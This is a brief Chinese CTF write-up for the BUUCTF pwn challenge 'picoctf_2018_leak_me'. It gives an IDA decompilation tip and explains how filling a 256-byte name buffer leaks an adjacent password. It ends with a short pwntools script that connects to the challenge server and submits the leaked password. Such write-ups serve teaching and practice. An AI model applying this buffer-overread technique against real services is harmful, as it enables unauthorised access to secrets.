[BUUCTF-pwn]——picoctf_2018_leak_me
题目没什么难度,但是可能反汇编的时候你们可能会出现一些问题。
peak小知识
pwn题,有时会碰到无法反汇编的情况,大多数情况下,都是call的位置报错,双击函数,按F5人为给它反汇编,再返回就可以了。不过有时候,是IDA栈指针的问题,大多数还是前者居多。
思路
在IDA中,v6代表name s是password.距离0x100也就是256。
输入256个字符后,我们可以直接将password泄露出来。这样我们就可以在下面调用flag函数了。
写个小dome leek出来password再说。
exploit
from pwn import *
p = remote("node3.buuoj.cn",27223)
p.sendline('a')
p.recv()
p.sendline('a_reAllY_s3cuRe_p4s$word_f85406')
p.interactive()